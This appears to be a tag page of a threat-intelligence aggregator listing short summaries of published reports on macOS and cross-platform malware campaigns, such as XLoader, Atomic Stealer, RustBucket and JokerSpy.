XLoader has returned on macOS as a native C/Objective-C variant masquerading as OfficeNote and signed with an Apple developer signature to bypass trust. It drops a payload, establishes persistence via a Launch Agent, exfiltrates browser and clipboard data, and…
Tag: MACOS
In July 2023, Mandiant Consulting responded to a supply chain compromise affecting a US-based software solutions entity. We believe the compromise ultimately began as a result of a sophisticated spear phishing campaign aimed at JumpCloud, a zero-trust directory platform service used for identity and access management. JumpCloud reported this unauthorized access…
JPCERT/CC details a DangerousPassword–linked campaign that targets developers in cryptocurrency exchanges across Windows, macOS, and Linux using Python and Node.js-based malware. The lifecycle includes multi-stage downloads, C2 beacons, and DLL sideloading, wi…
Lab52 detects a maldoc-based campaign targeting Chinese-speaking users, delivered via Chinese phishing and designed around a resume decoy. While the infection chain shares some traits with APT29, it features significant differences (Chinese-language decoy, pro…
TA453 (Charming Kitten) expands its espionage toolkit with new file types and cross‑platform Mac malware, deploying LNK infection chains and a PowerShell backdoor named GorjolEcho. Proofpoint and partners disrupted the operation, but TA453 continues targeting …
Neo_Net runs a global eCrime campaign targeting thousands of bank clients, focusing on Spanish and Chilean banks, from June 2021 to April 2023. The operation includes Ankarex Smishing-as-a-Service, phishing panels, and Android trojans to exfiltrate data via Te…
Elastic Security Labs has detected a new variant of the RustBucket malware targeting macOS, with added persistence and signature-reduction tactics in active development. The REF9135 operations attributed to the Lazarus Group (DPRK) show shifting infrastructure…
JokerSpy is a multi-stage macOS spyware campaign described by BitDefender and Elastic, featuring a trojanized QR code generator (QRLog), cross-platform backdoors (shared.dat and sh.py), and a macOS stager (xcc). The actors show a likely financially motivated e…
During routine detection maintenance, our Mac researchers stumbled upon a small
set of files with backdoor capabilities that seem to form part of a more complex
malware toolkit. The following analysis is incomplete, as we are trying to
identify the puzzle pieces that are still missing.
As of now, these samples are still largely undetected and very little
information is available about any of them. The earliest mention we could find
is an anonymous April 18 upload on VirusTotal (IoC A), as well
This article documents how legitimate macOS binaries (LOOBins) such as dscl, osascript/pbpaste, xattr, and curl are abused for discovery, clipboard theft, Gatekeeper bypass, and C2. It provides command examples and detection queries customers can use with EDR/…
JPCERT/CC highlights ongoing DangerousPassword campaigns against Japanese cryptocurrency exchanges, detailing four attack patterns: CHM files via LinkedIn, OneNote files, VHD-delivered payloads, and macOS targeting. The operators use social engineering, script…
ASEC reports SparkRAT was found distributed inside a VPN installer, indicating a supply-chain style compromise. The dropper creates SparkRAT in a local path, registers it for persistence, and enables remote control, information theft, and other malicious actio…
Atomic Stealer is a macOS infostealer sold via Telegram with multiple variants (A, B, C) and a web panel for campaign management. The article details how each variant operates, what data it targets (keychains, crypto wallets, browser data), and provides indica…
Checkpoint Research tracks how ROKRAT’s deployment has evolved into LNK-based, multi-stage infection chains that bypass macro restrictions, showing a shift from documents with macros to oversized LNK loaders. The campaigns target South Korean affairs, link to …
Cyble researchers reveal a Golang-based macOS stealer named Atomic macOS Stealer (AMOS) advertised on Telegram, designed to exfiltrate a wide range of victim data. The malware collects keychain passwords, system information, Desktop/Documents files, macOS pass…